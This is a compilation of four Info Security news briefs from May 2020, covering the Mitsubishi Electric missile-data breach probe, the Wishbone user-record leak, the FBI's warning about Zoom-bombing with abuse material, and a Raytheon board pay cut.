Japan Probes Theft of Hypersonic Missile Plans – Report

Info Security - Fri, 05/22/2020 - 09:10

The Japanese government is investigating a potentially serious breach of national security after a cyber-attack on Mitsubishi Electric earlier this year which may have yielded top secret missile plans.

The tech giant said in a statement earlier this week that it reported an incident to the Defense Ministry in February, in which sensitive information including personal data on 8000 employees may have been stolen, according to AP.

Chief cabinet secretary Yoshihide Suga is said to have told reporters that the government is now investigating “the possible impact of the information leak on national security.”

The stolen data is thought to relate to a prototype missile that Mitsubishi was bidding to build. The firm didn’t win the bid but held sensitive documents related to the design as part of the process.

Russia, the US and China appear to be in an arms race to build these hypersonic glide vehicles (HGVs), which are said to combine the speed of a ballistic missile with the maneuvering capabilities of a cruise missile, making them incredibly difficult for conventional defense systems to track.

Given that the missiles were apparently intended to be deployed in Japan’s southern islands to ward off the threat from an increasingly assertive China, it would seem that Beijing-backed hackers are likely to be behind these latest cyber-espionage efforts.

It’s unclear whether the reported incident relates to one revealed by Mitsubishi Electric in January, which took place back in June 2019.

At the time reports suggested likely Chinese hackers had stolen 200MB of data from the firm.

However, Mitsubishi claimed that, although personal and corporate confidential information may have been taken, “sensitive information on social infrastructure such as defense, electric power and railways, highly confidential technical information, and important information concerning business partners has not been leaked."

Categories: Cyber Risk News

Wishbone Breach: 40 Million Records Leaked on Dark Web

Info Security - Fri, 05/22/2020 - 08:15

A prolific dark web trader has leaked what they claim to be 40 million user records from popular mobile app Wishbone.

The individual known as “ShinyHunters” posted the data to RaidForums, claiming that, “since people are starting to resell wishbone we’ve decided to leak it for free.”

The post was shared by security vendor Cyble and indicates ongoing tension in the cybercrime community. Previously, the database was thought to be selling on the dark web for thousands of dollars.

ShinyHunters has been linked to multiple previous sales of breached data including Home Chef, which this week revealed that it had suffered a serious cybersecurity incident thought to have affected millions of customers.

Popular with youngsters, Wishbone is an iOS and Android app which allows users to “compare anything.”

The trove of data now available to all-comers includes usernames, email addresses, mobile numbers, gender, date-of-birth, Facebook and Twitter access tokens, MD5-hashed passwords and more.

This could provide fraudsters with plenty of information to carry out follow-on phishing attacks, credential stuffing and more.

Trevor Morgan, product manager at comforte AG, argued that tokenizing or securely encrypting the data could have helped Wishbone mitigate the impact of the breach.

“Unfortunately, in this case the stolen passwords were in MD5 format, a weak form of password hashing which can be decoded by malicious actors and therefore monetized through sale on hacking forums,” he explained.

“Encrypted or tokenized data, however, could not be listed for sale on the dark web because it becomes undecipherable without the necessary key, therefore reducing the likelihood of data exposure during a breach, and maintaining the security of valuable personal information.”

He urged organizations to rethink their security and data protection processes or risk becoming the next Wishbone.

This isn’t the first time Wishbone has been caught out. A 2016 breach affected 9.4 million records with 2.2 million unique email addresses, according to HaveIBeenPwned.

Categories: Cyber Risk News

Zoom Meetings Bombed with Child Sexual Abuse Material

Info Security - Thu, 05/21/2020 - 18:20

The disruption of nearly 200 Zoom meetings with images of child sexual abuse has prompted the FBI to issue a warning.

In recent months, schools, councils, businesses, and the general public have been using the videoconferencing app to communicate after social distancing and lockdown measures introduced to slow the spread of COVID-19 made face-to-face interaction difficult.  

However, as the number of legitimate users has risen, so too has the number of Zoom-bombing incidents in which malicious users hack meetings to subject attendees to unwanted language and images. 

While some Zoom-bombings consist of little more than a schoolboy prank, others are seriously offensive, featuring lewd imagery, expletives, and racist language. According to the FBI, a growing number of these cyber-attacks now feature material depicting the sexual abuse of minors. 

"During the last few months, the FBI has received more than 195 reports of incidents throughout the United States and in other countries in which a Zoom participant was able to broadcast a video depicting child sexual abuse material (CSAM)," wrote the FBI in a statement released yesterday.

"The FBI considers this activity to be a violent crime, as every time child sexual abuse material is viewed, the depicted child is re-victimized. Furthermore, anyone who inadvertently sees child sexual abuse material depicted during a virtual event is potentially a victim as well."

The Bureau asked any Zoom hosts or administrators who have had a meeting disrupted by the broadcast of CSAM to contact the FBI and to keep a record of what occurred. 

The FBI warned Zoom users to consider the privacy of any videoconferences they schedule. 

"Links to many virtual events are being shared online, resulting in a lack of vetting of approved participants," said the FBI. "Do not make meetings or classrooms public. Do not share a link to a teleconference or classroom on an unrestricted, publicly available social media post. Provide the link directly to specific attendees." 

The Bureau advised users to make their Zoom meetings private either by requiring attendees to enter a meeting password or by using the waiting room feature to control the admittance of guests.

To limit the risk of abusive content being shown, hosts can change the screen-sharing options to "Host Only." 

Categories: Cyber Risk News

Raytheon's Board Takes Voluntary Pay Cut

Info Security - Thu, 05/21/2020 - 17:34

Raytheon Technologies’ board of directors is taking a voluntary pay cut as the United States continues to be impacted by COVID-19. 

The board has reduced non-employee director compensation by an amount equal to 20% of the director cash retainer. The pay cut will apply for the annual term ending at the 2021 Annual Meeting of Shareowners.

The defense giant, which is headquartered in Waltham, Massachusetts, announced the board's gesture on May 14. 

News of the resolution follows a decision by CEO Greg Hayes to institute a temporary 10% base pay reduction for all salaried employees across the company's Pratt & Whitney and Collins Aerospace Systems businesses as well as its corporate offices. 

Raytheon employs 195,000 people across four industry-leading businesses: Collins Aerospace Systems, Pratt & Whitney, Raytheon Intelligence & Space, and Raytheon Missiles & Defense.

Temporary reductions in pay announced by Raytheon last month will go into effect from June and remain in place until the end of the year. 

Previously, CEO Greg Hayes and executive chairman Tom Kennedy had volunteered to slash their salaries by 20% for the same period.

In a statement released May 14, Raytheon said: "Raytheon Technologies continues to monitor the crisis and is responding as needed to ensure the wellbeing of its employees, customers and suppliers, while protecting the long-term financial strength of the business."

Raytheon Technologies Corporation was formed in 2020 through the combination of Raytheon Company and the United Technologies Corporation aerospace businesses. 

This week, the company confirmed that it is closing an office in Albuquerque, New Mexico, where 200 people are currently employed. 

Raytheon spokeswoman Heather Uberuaga said the company is seeking to streamline its capabilities and relocate support for key capabilities and customer programs to alternative facilities elsewhere in the United States.

"We think this move is in the best interest of our customers as we look to further integrate and streamline our capabilities with pursuits and programs located at other sites while working with employees on a case-by-case basis to explore their individual employment options going forward,” Uberuaga wrote in an email to the Albuquerque Journal.

Categories: Cyber Risk News
